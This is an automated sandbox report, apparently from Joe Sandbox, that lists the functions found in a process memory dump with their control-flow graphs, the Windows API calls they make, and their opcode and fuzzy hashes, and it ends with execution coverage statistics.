                                                                                                                                                                                                                          • API String ID: 3545744682-0
                                                                                                                                                                                                                          • Opcode ID: 50fb018fb414dfaef4ce8b5813ed76c5dafec3114e629dc7deaeeb645d738a5c
                                                                                                                                                                                                                          • Instruction ID: 0df75b0f3e7a9f6b47911572c58d1ce1b0426e276e3b5715d4a695722b51c6fa
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 50fb018fb414dfaef4ce8b5813ed76c5dafec3114e629dc7deaeeb645d738a5c
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 12D11735518F09CBC7A8EF58D845BEAB7D1FBA0310F18461FD846C3264DA78DA458ACB
                                                                                                                                                                                                                          Function 004A52A0 Relevance: 1.6, APIs: 1, Instructions: 137COMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 292 4a52a0-4a52a5 293 4a52ab-4a52f5 292->293 294 4a532e-4a533f 292->294 293->294 297 4a52f7 293->297 298 4a536b-4a5390 294->298 299 4a53fe 297->299 305 4a5392-4a539a 298->305 306 4a53c3 298->306 301 4e0d4c-4e0d4e 299->301 302 4a5404-4a540e 299->302 304 4a5424 302->304 307 4a542a 304->307 308 4a539b 304->308 305->308 307->308 311 4a5430-4a5443 307->311 309 4a539d-4a53a1 308->309 310 4a5413-4a5419 308->310 312 4a52b0-4a52b5 309->312 313 4a53a7 309->313 313->312 314 4a53ad 313->314 315 4a53af-4a53f1 314->315 316 4a53f3-4a53f9 314->316 315->310 315->316 316->299 319 4a5322-4a5328 316->319 320 4a532a 319->320 321 4a5355 319->321 320->321 322 4a532c 320->322 324 4a52e8-4a5363 321->324 325 4a52d1-4a52e7 321->325 322->294 328 4a53d1-4a53d5 324->328 329 4a5365 324->329 325->324 328->309 330 4a53d7 328->330 329->328 331 4a5367-4a5369 329->331 333 4a534b 330->333 334 4a5400-4a540e 330->334 331->298 333->334 335 4a5351-4a5353 333->335 334->304 335->321
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetSystemDefaultLangID.KERNELBASE ref: 004A53C4
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000C.00000002.2675604019.00000000004A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 004A0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_4a0000_alg.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: DefaultLangSystem
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 706401283-0
                                                                                                                                                                                                                          • Opcode ID: be85cc28eff309c6b04ec446b1d1922c7f56a33d23bc4027ac3bc4e0d37bd274
                                                                                                                                                                                                                          • Instruction ID: 5c2eebae1930c836f5ab933412e7c3180a40499b89c862095b54e74288c17e3a
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: be85cc28eff309c6b04ec446b1d1922c7f56a33d23bc4027ac3bc4e0d37bd274
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 88412B5240DE958FDB26422457243767BA0AB773E2F9D04D7D883CB2E2D19C0C86972F
                                                                                                                                                                                                                          Function 004A8070 Relevance: 4.7, APIs: 3, Instructions: 236COMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 79 4a8070-4a817e 81 4a813d-4a81a5 79->81 82 4a8180 79->82 88 4a81bd-4a81ca 81->88 89 4a81a7 81->89 82->81 85 4a8161 82->85 87 4a8163-4a8170 call 4d7164 85->87 93 4a8172 87->93 94 4a8186 CloseHandle 87->94 96 4a80f3 88->96 97 4a81d0 88->97 95 4a818c-4a8192 93->95 94->95 99 4a8194 95->99 100 4a8115-4a8118 95->100 101 4a808c 96->101 102 4a80f5 96->102 110 4a81fe-4a8201 GetTokenInformation 97->110 111 4a80c3 97->111 99->100 105 4a819a 99->105 103 4a8119-4a811a 100->103 104 4a80a7 100->104 106 4a808e-4a8184 101->106 102->101 112 4a8077 102->112 103->104 109 4a811c 103->109 105->81 106->94 106->95 115 4a820f 109->115 110->115 125 4a81b7 110->125 111->110 116 4a80c9 111->116 117 4a81d7-4a81de call 4d715c 112->117 115->106 122 4a8215-4a821e 115->122 120 4a80ca-4a80d8 GetTokenInformation 116->120 123 4a81e3-4a81e6 117->123 124 4a810f 120->124 122->106 135 4a8224 122->135 123->120 137 4a8089 123->137 128 4a812d 124->128 129 4a8111 124->129 125->115 127 4a81b9-4a81bb 125->127 127->88 132 4a80a8 128->132 133 4a8133-4a81f0 128->133 129->128 134 4a8113 129->134 138 4a80aa-4a80ad 132->138 141 4a80da-4a80f1 133->141 142 4a81f6 133->142 134->100 135->117 139 4a8226 135->139 137->120 143 4a808b 137->143 138->87 144 4a80b3-4a8203 138->144 139->117 140 4a8228-4a82ee call 4a5d90 139->140 154 4a830c-4a8320 call 4a5d90 call 4aec00 140->154 155 4a82f0 140->155 141->138 142->141 147 4a81fc 142->147 143->101 144->87 149 4a8209 144->149 147->110 158 4a82f7-4a82fc call 4a5d90 154->158 170 4a8322 154->170 155->154 156 4a82f2 155->156 156->158 165 4a8302 158->165 166 4a8253-4a8265 call 4c1280 158->166 165->166 169 4a8308-4a830a 165->169 173 4a826b 166->173 174 4a8328 166->174 169->154 170->158 172 4a8324-4a8326 170->172 172->174 173->174 177 4a823f-4a8243 173->177 178 4a82df-4a832b 174->178 179 4a8335 174->179 177->158 178->179 182 4a832d-4a8331 178->182 183 4a829b-4a829d 179->183 184 4a8287 179->184 182->179 184->183 186 4a824e-4a8252 184->186 186->166
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000C.00000002.2675604019.00000000004A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 004A0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_4a0000_alg.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: cf7e178ce7ef8c8b8ed7a0a6b190087b473b65ce30721fb285446cac81d704f7
                                                                                                                                                                                                                          • Instruction ID: bbed80a22702128bee11be346f0823842681b1d387ef945bcc9606c69e636c07
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cf7e178ce7ef8c8b8ed7a0a6b190087b473b65ce30721fb285446cac81d704f7
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D3611F3260CA458FDB659B28881833B7AA0FB77350F59469FE446C32A1DF2C8C46934F
                                                                                                                                                                                                                          Function 004A5910 Relevance: 1.9, APIs: 1, Instructions: 607COMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 187 4a5910-4a5968 189 4a596a 187->189 190 4a5915-4a5928 call 4d9970 187->190 189->190 193 4a5931-4b072c 189->193 196 4a59b8 call 4c0df0 190->196 198 4b0732-4b0738 193->198 199 4b0806-4b0809 193->199 201 4a59bd-4a59c2 call 4a5d90 196->201 202 4b073e 198->202 203 4b0800 198->203 206 4b079d-4b07a6 199->206 208 4a59c7-4a59ce 201->208 202->203 204 4b0744-4b0774 202->204 203->199 205 4b06b3-4b06b7 203->205 215 4b077a-4b081c 204->215 216 4b06d5-4b06d9 204->216 205->206 210 4b06bd 205->210 211 4b07a8 206->211 212 4b0791-4b0793 206->212 213 4a5a1a-4a5a26 call 4a5e10 208->213 214 4a59d0 208->214 210->206 217 4b06c3-4b07fe 210->217 211->212 219 4b07aa 211->219 218 4b07ca-4b07cc 212->218 213->196 232 4a5a08-4a5a0b 213->232 214->213 220 4a59d2-4a59d8 214->220 215->206 223 4b06db 216->223 224 4b06df 216->224 217->203 219->218 239 4a59d9-4a59de call 4d2190 220->239 223->224 227 4b06dd 223->227 224->206 227->224 231 4bc0cc 227->231 233 4bc0e8-4bc102 231->233 234 4bc0ce-4bc0d0 231->234 237 4a5a0d 232->237 238 4a5994-4a599c 232->238 235 4bc0d2-4bc0df 233->235 236 4bc104 233->236 234->235 247 4bc0e7 235->247 236->235 236->247 250 4a5932 237->250 251 4a5991 237->251 244 4a599e-4a59f7 238->244 245 4a5a02 238->245 239->238 255 4a59e0 239->255 244->245 253 4a597d 245->253 254 4a59d4-4a5a15 call 4c11a0 245->254 252 4a59e4-4a59ec call 4d21ac 250->252 251->250 256 4a5993 251->256 264 4a59ed 252->264 265 4a5a62-4a5a6e 252->265 253->254 258 4a597f-4a5981 253->258 255->238 259 4a59e2 255->259 256->238 263 4a5983-4a5a38 258->263 259->252 263->238 270 4a5a3e 263->270 264->263 268 4a59ee-4a59ef 264->268 271 4a5a70 265->271 272 4a5a75-4a5ab3 call 4c1280 265->272 268->263 273 4a59f1 268->273 270->239 271->272 274 4a5a72 271->274 280 4a5abb-4a5ac9 272->280 281 4a5ab5 272->281 273->190 274->272 283 4a5af2-4a5af5 280->283 281->280 282 4a5ab7-4a5ab9 281->282 282->280 286 4a5adb-4a5adc 283->286 287 4a5ad5 283->287 289 4a5ae2 286->289 290 4a5a45-4a5a46 286->290 287->286 288 4a5ad7-4a5ad9 287->288 288->286 289->290 291 4a5ae8 289->291 291->283
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000C.00000002.2675604019.00000000004A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 004A0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_4a0000_alg.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: e90e7e2e724923c4c3215ef0cf0bb56b8834fac7198073354a1960af46dae333
                                                                                                                                                                                                                          • Instruction ID: 371faf2ebadcca8ad16299331dc2f6f163353655e7d42fdd3bfb511cec95f06a
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e90e7e2e724923c4c3215ef0cf0bb56b8834fac7198073354a1960af46dae333
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 50F15A2571CE488FC6A9A71D5845BBBB3D2E7AA314F58019FD04AC7397CD2C9C06839E
                                                                                                                                                                                                                          Function 004A5B42 Relevance: 1.6, APIs: 1, Instructions: 92COMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 336 4a5b42-4a5b47 call 4a5d90 338 4a5b4c-4a5b52 336->338 340 4a5b0d 338->340 341 4a5c42-4a5c62 call 4c1280 338->341 340->341 342 4a5b13 340->342 356 4a5c26 341->356 357 4a5c14-4a5cc0 341->357 344 4a5c8f-4a5c96 342->344 346 4a5c98-4a5c9a 344->346 347 4a5c29 344->347 348 4a5c9c 346->348 349 4a5c2f-4a5c36 347->349 350 4a5cc2-4a5cc9 call 4a52a0 347->350 359 4a5bfa 348->359 360 4a5d0e-4a5d18 348->360 349->350 353 4a5c3c 349->353 362 4a5ccb 350->362 363 4a5c69 350->363 353->336 356->357 361 4a5c28 356->361 357->350 359->360 364 4a5c00 359->364 365 4a5d1a 360->365 366 4a5d54 360->366 361->347 362->348 368 4a5ccd 362->368 369 4a5b68-4a5d75 363->369 370 4a5c6f 363->370 364->357 371 4a5d4b-4a5d52 365->371 368->348 373 4a5ccf-4a5ce4 CreateThread 368->373 370->369 375 4a5c75 370->375 371->366 372 4a5d45-4a5d47 371->372 376 4a5d49 372->376 377 4a5d5f 372->377 379 4a5cea 373->379 380 4a5c01-4a5c05 373->380 375->344 376->371 376->377 382 4a5d65 377->382 379->380 383 4a5cf0-4a5cf6 379->383 384 4a5c20-4a5c68 380->384 387 4a5d37-4a5d41 380->387 382->382 383->384 387->371 388 4a5d43 387->388 388->366
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000C.00000002.2675604019.00000000004A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 004A0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_4a0000_alg.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: e621a31e3968f1923c5a392cbe1e15984b311d240008ef38e05b1dbcaa09ae1e
                                                                                                                                                                                                                          • Instruction ID: b13c497299f946aa079adac70c4b8f9398f49dbdae51e28fe364947126b322f7
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e621a31e3968f1923c5a392cbe1e15984b311d240008ef38e05b1dbcaa09ae1e
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0321B53020CF44CFDB699B18964877666E1AB77321F6841A79047CF39AD62CDC45932E
                                                                                                                                                                                                                          Function 004A5B09 Relevance: 1.6, APIs: 1, Instructions: 60COMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 389 4a5b09-4a5d01 394 4a5d07 389->394 395 4a5bb4-4a5ce4 CreateThread 389->395 394->395 397 4a5d0d 394->397 402 4a5cea 395->402 403 4a5c01-4a5c05 395->403 399 4a5d37-4a5d41 397->399 400 4a5d4b-4a5d52 399->400 401 4a5d43 399->401 404 4a5d54 400->404 405 4a5d45-4a5d47 400->405 401->404 402->403 407 4a5cf0-4a5cf6 402->407 403->399 410 4a5c20-4a5c68 403->410 408 4a5d49 405->408 409 4a5d5f 405->409 407->410 408->400 408->409 413 4a5d65 409->413 413->413
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000C.00000002.2675604019.00000000004A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 004A0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_4a0000_alg.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 355f5de826a502d2b078035f50b0d1b19bc6bd6d86d359f9387c1ff3fa9cfd06
                                                                                                                                                                                                                          • Instruction ID: 10e0d821a3f27bdcc91b59c4cd297bf2c0de565faee117d50b4f3b522f3ae712
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 355f5de826a502d2b078035f50b0d1b19bc6bd6d86d359f9387c1ff3fa9cfd06
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7F01D23010DF468FEB5556249F1837A7B90AB37335F2501ABC487CA199DB6C4A02E71F
                                                                                                                                                                                                                          Function 004A5B87 Relevance: 1.5, APIs: 1, Instructions: 23threadCOMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 414 4a5b87-4a5b99 CreateThread 415 4a5cff-4a5d01 414->415 416 4a5b1c-4a5b3b 414->416 417 4a5d07 415->417 418 4a5bb4-4a5ce4 CreateThread 415->418 416->415 417->418 421 4a5d0d 417->421 426 4a5cea 418->426 427 4a5c01-4a5c05 418->427 423 4a5d37-4a5d41 421->423 424 4a5d4b-4a5d52 423->424 425 4a5d43 423->425 428 4a5d54 424->428 429 4a5d45-4a5d47 424->429 425->428 426->427 431 4a5cf0-4a5cf6 426->431 427->423 434 4a5c20-4a5c68 427->434 432 4a5d49 429->432 433 4a5d5f 429->433 431->434 432->424 432->433 437 4a5d65 433->437 437->437
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000C.00000002.2675604019.00000000004A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 004A0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_4a0000_alg.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CreateThread
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2422867632-0
                                                                                                                                                                                                                          • Opcode ID: a986bd5c00f5553bdb8598d00602888b78738e64b994e3da4fa4453f2922062f
                                                                                                                                                                                                                          • Instruction ID: 57bb9503ac938590158324a2601c14b03017ce0d62d7cd7c0eaec2068d7395d5
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a986bd5c00f5553bdb8598d00602888b78738e64b994e3da4fa4453f2922062f
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 37E0863060DB444FDB599B2459103193AE5FBAA321F1501CFC44AD72D5CB6D1E06879B
                                                                                                                                                                                                                          Function 004A599B Relevance: 1.3, APIs: 1, Instructions: 48COMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 438 4a599b-4a599e 439 4a59b8 call 4c0df0 438->439 440 4a59f7 438->440 444 4a59bd-4a59c2 call 4a5d90 439->444 441 4a5a02 440->441 445 4a597d 441->445 446 4a59d4-4a5a15 call 4c11a0 441->446 448 4a59c7-4a59ce 444->448 445->446 450 4a597f-4a5981 445->450 451 4a5a1a-4a5a26 call 4a5e10 448->451 452 4a59d0 448->452 454 4a5983-4a5a38 450->454 451->439 467 4a5a08-4a5a0b 451->467 452->451 455 4a59d2-4a59d8 452->455 461 4a5a3e 454->461 462 4a5994-4a599c 454->462 468 4a59d9-4a59de call 4d2190 455->468 461->468 462->441 466 4a599e 462->466 466->440 467->462 469 4a5a0d 467->469 468->462 475 4a59e0 468->475 473 4a5932 469->473 474 4a5991 469->474 476 4a59e4-4a59ec call 4d21ac 473->476 474->473 477 4a5993 474->477 475->462 478 4a59e2 475->478 481 4a59ed 476->481 482 4a5a62-4a5a6e 476->482 477->462 478->476 481->454 483 4a59ee-4a59ef 481->483 484 4a5a70 482->484 485 4a5a75-4a5ab3 call 4c1280 482->485 483->454 486 4a59f1 call 4d9970 483->486 484->485 487 4a5a72 484->487 495 4a5abb-4a5ac9 485->495 496 4a5ab5 485->496 486->439 487->485 498 4a5af2-4a5af5 495->498 496->495 497 4a5ab7-4a5ab9 496->497 497->495 501 4a5adb-4a5adc 498->501 502 4a5ad5 498->502 504 4a5ae2 501->504 505 4a5a45-4a5a46 501->505 502->501 503 4a5ad7-4a5ad9 502->503 503->501 504->505 506 4a5ae8 504->506 506->498
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000C.00000002.2675604019.00000000004A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 004A0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_4a0000_alg.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: wcscpy
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1284135714-0
                                                                                                                                                                                                                          • Opcode ID: 8e94e48f973075b9c3d4ec6308a445e85aa06e16b06886589236a1baba8d32d8
                                                                                                                                                                                                                          • Instruction ID: d24eec7d88b9027c1db6372d8c45e599d3f6b57bc1e515dcbfcc1af5edf1a993
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8e94e48f973075b9c3d4ec6308a445e85aa06e16b06886589236a1baba8d32d8
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C001F2E160EE80CFD656A618530127B655AB77B324F28459B904ACF2A2C82C4D02938F
                                                                                                                                                                                                                          Function 004A8090 Relevance: 1.3, APIs: 1, Instructions: 14COMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 507 4a8090-4a8096 508 4a813c-4a81a5 507->508 509 4a8184 507->509 522 4a81bd-4a81ca 508->522 523 4a81a7 508->523 510 4a818c-4a8192 509->510 511 4a8186 CloseHandle 509->511 513 4a8194 510->513 514 4a8115-4a8118 510->514 511->510 513->514 517 4a819a 513->517 515 4a8119-4a811a 514->515 516 4a80a7 514->516 515->516 519 4a811c 515->519 517->508 521 4a820f 519->521 524 4a808e-4a8096 521->524 525 4a8215-4a821e 521->525 528 4a80f3 522->528 529 4a81d0 522->529 524->509 525->524 533 4a8224 525->533 531 4a808c 528->531 532 4a80f5 528->532 539 4a81fe-4a8201 GetTokenInformation 529->539 540 4a80c3 529->540 531->524 532->531 542 4a8077 532->542 536 4a8226 533->536 537 4a81d7-4a81e6 call 4d715c 533->537 536->537 538 4a8228-4a82ee call 4a5d90 536->538 547 4a80ca-4a810f GetTokenInformation 537->547 556 4a8089 537->556 562 4a830c-4a8320 call 4a5d90 call 4aec00 538->562 563 4a82f0 538->563 539->521 554 4a81b7 539->554 540->539 544 4a80c9 540->544 542->537 544->547 558 4a812d 547->558 559 4a8111 547->559 554->521 557 4a81b9-4a81bb 554->557 556->547 564 4a808b 556->564 557->522 560 4a80a8 558->560 561 4a8133-4a81f0 558->561 559->558 565 4a8113 559->565 568 4a80aa-4a80ad 560->568 570 4a80da-4a80f1 561->570 571 4a81f6 561->571 572 4a82f7-4a82fc call 4a5d90 562->572 594 4a8322 562->594 563->562 567 4a82f2 563->567 564->531 565->514 567->572 574 4a8163-4a8170 call 4d7164 568->574 575 4a80b3-4a8203 568->575 570->568 571->570 577 4a81fc 571->577 587 4a8302 572->587 588 4a8253-4a8265 call 4c1280 572->588 574->511 589 4a8172 574->589 575->574 583 4a8209 575->583 577->539 587->588 593 4a8308-4a830a 587->593 597 4a826b 588->597 598 4a8328 588->598 589->510 593->562 594->572 596 4a8324-4a8326 594->596 596->598 597->598 601 4a823f-4a8243 597->601 602 4a82df-4a832b 598->602 603 4a8335 598->603 601->572 602->603 606 4a832d-4a8331 602->606 607 4a829b-4a829d 603->607 608 4a8287 603->608 606->603 608->607 610 4a824e-4a8252 608->610 610->588
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000C.00000002.2675604019.00000000004A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 004A0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_4a0000_alg.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CloseHandle
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2962429428-0
                                                                                                                                                                                                                          • Opcode ID: 618394ff9deb9f6b5e010b5aaee4db8be701b981e1d63e6b3fb36a727850c086
                                                                                                                                                                                                                          • Instruction ID: aa79c47f8817bf1c0211969f4e1b0d704a2f0899b2a208951fff69cd6a09c941
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 618394ff9deb9f6b5e010b5aaee4db8be701b981e1d63e6b3fb36a727850c086
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 09C08C7122A80A96527802880C0B0F22600E233358B0C000F8C0280320DD4C8E03209F
                                                                                                                                                                                                                          Function 004A817F Relevance: 1.3, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 611 4a817f 612 4a8184 611->612 613 4a818c-4a8192 612->613 614 4a8186 CloseHandle 612->614 615 4a8194 613->615 616 4a8115-4a8118 613->616 614->613 615->616 619 4a819a-4a81a5 615->619 617 4a8119-4a811a 616->617 618 4a80a7 616->618 617->618 620 4a811c 617->620 629 4a81bd-4a81ca 619->629 630 4a81a7 619->630 622 4a820f 620->622 624 4a808e-4a8096 622->624 625 4a8215-4a821e 622->625 624->612 625->624 631 4a8224 625->631 639 4a80f3 629->639 640 4a81d0 629->640 632 4a8226 631->632 633 4a81d7-4a81e6 call 4d715c 631->633 632->633 634 4a8228-4a82ee call 4a5d90 632->634 654 4a80ca-4a810f GetTokenInformation 633->654 655 4a8089 633->655 659 4a830c-4a8320 call 4a5d90 call 4aec00 634->659 660 4a82f0 634->660 643 4a808c 639->643 644 4a80f5 639->644 650 4a81fe-4a8201 GetTokenInformation 640->650 651 4a80c3 640->651 643->624 644->643 652 4a8077 644->652 650->622 670 4a81b7 650->670 651->650 656 4a80c9 651->656 652->633 664 4a812d 654->664 665 4a8111 654->665 655->654 661 4a808b 655->661 656->654 669 4a82f7-4a82fc call 4a5d90 659->669 696 4a8322 659->696 660->659 663 4a82f2 660->663 661->643 663->669 667 4a80a8 664->667 668 4a8133-4a81f0 664->668 665->664 671 4a8113 665->671 676 4a80aa-4a80ad 667->676 679 4a80da-4a80f1 668->679 680 4a81f6 668->680 687 4a8302 669->687 688 4a8253-4a8265 call 4c1280 669->688 670->622 675 4a81b9-4a81bb 670->675 671->616 675->629 682 4a8163-4a8170 call 4d7164 676->682 683 4a80b3-4a8203 676->683 679->676 680->679 686 4a81fc 680->686 682->614 698 4a8172 682->698 683->682 693 4a8209 683->693 686->650 687->688 694 4a8308-4a830a 687->694 701 4a826b 688->701 702 4a8328 688->702 694->659 696->669 699 4a8324-4a8326 696->699 698->613 699->702 701->702 705 4a823f-4a8243 701->705 706 4a82df-4a832b 702->706 707 4a8335 702->707 705->669 706->707 710 4a832d-4a8331 706->710 711 4a829b-4a829d 707->711 712 4a8287 707->712 710->707 712->711 714 4a824e-4a8252 712->714 714->688
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000C.00000002.2675604019.00000000004A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 004A0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_4a0000_alg.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CloseHandle
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2962429428-0
                                                                                                                                                                                                                          • Opcode ID: a0153765961d18982154f5649a6418830ea2767f573826a199b39b51e69f8ae7
                                                                                                                                                                                                                          • Instruction ID: a10458964d86b8a0352008fec25544c7925d33f538bd2d4dbd5fbb17c9e9604b
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a0153765961d18982154f5649a6418830ea2767f573826a199b39b51e69f8ae7
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1BC092B155A50D87517827C82C0A0B33554D633768F0C841FEC169A3A2DD9C5D4365AF

                                                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                                                          Execution Coverage:4%
                                                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                          Signature Coverage:0%
                                                                                                                                                                                                                          Total number of Nodes:2000
                                                                                                                                                                                                                          Total number of Limit Nodes:11
